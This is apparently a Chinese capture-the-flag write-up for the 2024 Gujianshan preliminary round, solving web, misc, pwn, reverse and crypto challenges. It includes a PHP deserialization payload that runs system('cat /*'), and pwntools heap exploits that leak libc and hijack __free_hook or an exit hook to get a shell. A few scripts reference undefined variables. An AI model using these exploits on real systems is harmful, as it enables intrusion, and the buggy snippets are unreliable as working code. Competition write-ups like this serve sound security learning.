2024古剑山初赛WP
2024古剑山WP
Web
un
能读源码
<?php
error_reporting(0);
class pop
{
public $aaa;
public static $bbb = false;
public function __wakeup()
{
// PHP 5.4
throw new Exception("You're banned to serialize pop!");
}
public function __destruct()
{
for ($i=0; $i<2; $i++) {
if (self::$bbb) {
$this->aaa[1]($this->aaa[2]);
} else {
self::$bbb = call_user_func($this->aaa["object"]);
}
}
}
}
if (isset($_GET["code"])) {
unserialize(base64_decode($_GET["code"]));
} elseif (isset($_GET["f"])) {
if(is_string($_GET["f"]) === false){
echo "The f param must be string";
exit();
}
$user_f = $_GET["f"];
$regex = "/[ <>?!@#$%&*()+=|\\-\\\\}{:\";'~`,\\/]/";
if(preg_match($regex, $user_f)){
echo "The ".$user_f." has been detected by regular expression: ".$regex;
exit();
}
echo file_get_contents($user_f);
}else{
echo "<a href='/index.php?f=secret'>show me secret!</a>";
}
直接打就行,绕一下wakeup
<?php
error_reporting(0);
class pop
{
public $aaa;
public static $bbb = true;
public function __wakeup()
{
// PHP 5.4
throw new Exception("You're banned to serialize pop!");
}
public function __destruct()
{
for ($i=0; $i<2; $i++) {
if (self::$bbb) {
$this->aaa[1]($this->aaa[2]);
} else {
self::$bbb = call_user_func($this->aaa["object"]);
}
}
}
}
$var = new pop();
$var->aaa[1] = "system";
$var->aaa[2] = "cat /*";
$var->aaa["object"]="phpinfo";
echo base64_encode(serialize($a));
Misc
蓝书包(一血)
下载附件,发现很多压缩包,一开始考虑是时间戳隐写,banzip爆破了一下发现有密码
试了试发现有规律
10001
10002
10003之后GPT搞个脚本
import pyzipper
import os
# 配置文件夹路径
source_folder = r"C:\Users\15747\AppData\Local\Temp\MicrosoftEdgeDownloads\aa788e29-bd40-41e0-b408-0e2393c58c47\069db7f5cb3f400ba9a1eef0ebb78390"
destination_folder = r"C:\Users\15747\AppData\Local\Temp\MicrosoftEdgeDownloads\aa788e29-bd40-41e0-b408-0e2393c58c47\1"
# 解压并处理每个 ZIP 文件
def extract_zip_files(source_folder, destination_folder):
for file_index in range(1, 183): # 从 1 到 182 的 zip 文件
zip_file_path = os.path.join(source_folder, f'{file_index}.zip')
password = f'1{file_index:04d}' # 根据文件索引生成密码,如 10001, 10002, ..., 10182
print(f"处理文件 {zip_file_path} 使用密码 {password}")
try:
# 使用 pyzipper 打开并解压文件
with pyzipper.AESZipFile(zip_file_path) as zip_file:
zip_file.setpassword(password.encode()) # 设置密码
zip_file.extractall(destination_folder) # 解压到目标文件夹
print(f"解压成功: {zip_file_path}")
except Exception as e:
print(f"解压失败: {zip_file_path}, 错误: {e}")
# 调用函数进行解压操作
extract_zip_files(source_folder, destination_folder)
之后发现有PNG头,拼接一下
import os
# 配置文件夹路径
source_folder = r"E:\Documents\WeChat Files\wxid_z1ez13mhhho722\FileStorage\File\2024-11\ouy"
output_file_path = r"E:\Documents\WeChat Files\wxid_z1ez13mhhho722\FileStorage\File\2024-11\ouy\1.png"
# 函数:生成从 'aa' 到 'gz' 的文件名列表
def generate_file_names():
file_names = []
for first_char in range(26): # A-Z
for second_char in range(26): # A-Z
# 生成文件名,如 'saa', 'sab', ..., 'sgz'
file_names.append(f's{chr(97 + first_char)}{chr(97 + second_char)}.png')
return file_names
# 获取所有需要拼接的文件名
file_names_to_concatenate = generate_file_names()
# 拼接文件(以二进制模式)
def concatenate_files(file_names, source_folder, output_file_path):
with open(output_file_path, 'wb') as output_file:
for file_name in file_names:
file_path = os.path.join(source_folder, file_name)
try:
# 以二进制模式打开每个文件并将其内容写入输出文件
with open(file_path, 'rb') as file_to_concatenate:
output_file.write(file_to_concatenate.read()) # 写入文件内容
print(f'{file_name} 拼接成功')
except Exception as e:
print(f'拼接 {file_name} 时出错: {e}')
# 调用函数进行文件拼接
concatenate_files(file_names_to_concatenate, source_folder, output_file_path)
得到一个png,之后猜测cloacked-pixel爆破
jpg
附件一个加密压缩包,winhex看了一下发现伪加密,工具修一下
得到一个flag.pdf,winhex看了一下里面有一个图片,PS打开得到一个二维码
得到一个sha256,AR做一下明文攻击
得到flag.txt
Pwn
mis
一开始发现没有uaf还挺头疼的
但是发现可以进行堆溢出,修改了chunk1的size发现可以重叠泄露libc
劫持free_hook为system即可
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
fn='./pwn'
libc=ELF('./libc.so.6')
eir = 0
if eir == 1:
p=remote("",)
elif eir == 0:
p=process(fn)
elf=ELF(fn)
def open_gdb_terminal():
pid = p.pid
gdb_cmd = f"gdb -ex 'attach {pid}' -ex 'set height 0' -ex 'set width 0'"
subprocess.Popen(["gnome-terminal", "--geometry=120x64+0+0", "--", "bash", "-c", f"{gdb_cmd}; exec bash"])
def dbg():
open_gdb_terminal()
pause()
sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ita = lambda : p.interactive()
l64 = lambda : u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
pt = lambda s : print("leak----->",hex(s))
def menu(idx):
sa("4.show",str(idx))
def add(idx,cnt):
menu(1)
sa("Input index: ",str(idx))
sa("Input size: ",str(0xf0))
sa("Input note: ",cnt)
def dele(idx):
menu(2)
sa("Input index: ",str(idx))
def show(index):
menu(4)
sa("Input index: ",str(index))
def edit(idx,cnt):
menu(3)
sa("Input index: ",str(idx))
sa("Input note: ",cnt)
add(0,b'a'*0x30)
add(1,b'a'*0x30)
add(2,b'a'*0xf0)
add(3,b'a'*0xf0)
add(4,b'a'*0xf0)
add(5,b'a'*0xf0)
add(6,b'/bin/sh\x00')
edit(0,b'b'*0x38+p64(0x441))
dele(1)
add(1,b'a'*0x38)
show(2)
libc_leak=l64()
pt(libc_leak)
libc_base=libc_leak-0x3ebca0
free_hook=libc_base+libc.sym['__free_hook']
system=libc_base+libc.sym['system']
ogs=[0x4f35e,0x4f365,0x4f3c2,0x10a45c]
og=libc_base+ogs[0]
add(0,b'a'*0x30)
add(1,b'b'*0x30)
add(2,b'c'*0x30)
add(3,b'd'*0x30)
add(4,b'e'*0xf0)
add(5,b'f'*0xf0)
dele(1)
dele(3)
edit(2,b'z'*0x38+p64(0x41)+p64(free_hook))
add(6,b'/bin/sh\x00')
add(7,b'a'*0x30)
add(8,b'a'*0x30)
edit(7,p64(system))
edit(8,p64(system))
dele(6)
ita()in
最近见了好多这样的题,利用stdout泄露libc即可
from pwn import *
context.log_level='debug'
context(os='linux', arch='amd64')
p = process('./pwn')
libc = ELF('./libc-2.23.so')
elf = ELF('./pwn')
#p.recv()
p.recvuntil(b"Size:\n")
p.sendline(str(0x5e6611))
p.recvuntil(b"Size:\n")
p.sendline(str(0x220000))
p.recv()
p.send(b"\x18")
p.send(b"\x20")
libc_base = u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00")) - (0x7fbf86558640-0x7fbf86193000)
print("libc_base = " + hex(libc_base))
ogs = [0x45216,0x4526a,0xf02a4,0xf1147]
og = libc_base + one_gadgets[3]
ogg = p64(og)[:3]
exit_hook = libc_base + 0x5f0040+3848
p.recvuntil(b"!\n")
p.sendline(p64(exit_hook))
p.send(ogg)
p.interactive()Re
re
DIE看没壳,IDA反编译发现有问题,winhex发现进行魔改壳了
直接debug
找到主程序逻辑了,但是一直dump不出来,
从网上搜到原题
[re]无需脱壳dump内存来静态分析_ida vmp分析-CSDN博客
直接交文章中的flag就行
India Pale Ale
添加后缀zip,之后解压缩,把
EasyIOS拖到IDA里就能正常分析了
换表base+rc4
key是SimpleKeyHere异或0xa5
import base64
from Crypto.Cipher import ARC4
table1 = "NF01ihUKST9q3lnjEBs47k2w5ad+AVHfPezg/CDyxrMLR6GvomIQJOXcpW8ZbutY="
table2 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
data = [
-24, -24, -60, -54, -95, -46, -45, -3, -96, -96, -63, -7,
-87, -40, -3, -22, -36, -47, -32, -62, -59, -88, -90, -31,
-24, -45, -9, -43, -91, -60, -13, -40, -55, -95, -34, -46,
-27, -25, -33, -9, -32, -40, -32, -41
]
result = []
for x in data:
result.append((x & 0xFF) ^ 0x90)
c = bytes(result)
c = c.decode()
print(c)
translation_table = str.maketrans(table1, table2)
transformed = c.translate(translation_table)
decoded_flag = base64.b64decode(transformed)
key = b"SimpleKeyHere"
key_bytes = []
for x in key:
key_bytes.append(x ^ 0xA5)
key_bytes = bytes(key_bytes)
cipher = ARC4.new(key_bytes)
flag = cipher.decrypt(decoded_flag)
print(flag)
b'flag{45_4_105_r3v3r51n6_b361nn3r}'
Crypto
cs
一开始考虑的是进制,后来转了一下没啥想法,进行2、2分组,发现只有两种组合,j后面跟一个数字,k后面跟一个数字
之后做位移,发现要不就是偏移2要不就是12
jh => f
jn => l
jc => a
ji => g依次类推,得到
flagathisisrealflagc猜测把a和c改为{}
flag{thisisrealflag}
转载
分享
0 条评论
可输入 255 字
发布投稿
优秀作者
